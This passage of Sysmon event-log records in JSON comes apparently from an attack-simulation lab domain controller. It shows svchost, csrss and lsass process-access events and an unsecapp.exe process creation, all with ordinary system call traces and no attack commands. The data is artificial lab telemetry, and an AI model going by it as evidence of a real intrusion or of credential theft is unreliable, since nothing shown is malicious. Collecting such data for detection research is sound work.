05:46:45.904","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1248,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.912\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.912","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1249,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.912\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.912","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1250,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.912\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.912","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1251,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.915\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010A7CD0200}\r\nProcessId: 3244\r\nImage: C:\\Windows\\System32\\wbem\\unsecapp.exe\r\nFileVersion: 10.0.14393.2515 (rs1_release_1.180830-1044)\r\nDescription: Sink to receive asynchronous callbacks for WMI client application\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: unsecapp.dll\r\nCommandLine: C:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.915","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010A7CD0200}","Image":"C:\\Windows\\System32\\wbem\\unsecapp.exe","FileVersion":"10.0.14393.2515 (rs1_release_1.180830-1044)","Description":"Sink to receive asynchronous callbacks for WMI client application","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"unsecapp.dll","CommandLine":"C:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1252,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.917\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7CD0200}\r\nTargetProcessId: 3244\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.917","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7CD0200}","TargetProcessId":"3244","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1253,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.917\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7CD0200}\r\nTargetProcessId: 3244\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.917","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7CD0200}","TargetProcessId":"3244","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1254,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.924\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7CD0200}\r\nTargetProcessId: 3244\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.924","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7CD0200}","TargetProcessId":"3244","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1255,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.938\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.938","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
